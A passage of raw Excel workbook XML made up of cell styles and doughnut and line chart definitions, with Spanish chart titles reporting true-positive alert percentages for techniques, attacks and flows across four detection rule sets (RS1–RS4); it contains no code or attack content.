      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="39" fillId="13" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="13" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="1" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="2" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="4" numFmtId="10" xfId="0" applyBorder="1" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="48" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="50" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="49" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="33" fillId="0" fontId="62" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="33" fillId="0" fontId="63" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="40" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="41" fillId="0" fontId="64" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="51" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="52" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="53" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="52" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="53" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="52" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="52" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="13" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="14" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="65" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"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s>
</file>

<file path=xl/charts/_rels/chartEx1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2011/relationships/chartStyle" Target="style1.xml"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2011/relationships/chartColorStyle" Target="colors1.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE TÉCNICAS CON ALERTA TP PARA RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$45:$DQ$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE ATAQUES CON ALERTA TP PARA RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.03425"/>
          <c:y val="0.04730458221024259"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DX$45:$DX$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE TÉCNICAS CON ALERTA TP PARA RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DR$45:$DR$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart4.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE ATAQUES CON ALERTA TP PARA RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DY$45:$DY$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart5.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE TÉCNICAS CON ALERTA TP PARA RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DS$45:$DS$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart6.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE ATAQUES CON ALERTA TP PARA RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DZ$45:$DZ$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart7.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE TÉCNICAS CON ALERTA TP PARA RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DT$45:$DT$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart8.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE DE ATAQUES CON ALERTA TP PARA RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EA$45:$EA$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart9.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS TP (Manual) / RuleSet</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Porcentaje Total</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dPt>
            <c:idx val="0"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.04813129127020286"/>
                  <c:y val="0.9163490663758272"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr/>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$74:$N$74</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$75:$N$75</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Porcentaje Promedio</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:trendline>
            <c:name>Tendencia de Porcentaje Promedio</c:name>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="B6D7A8">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
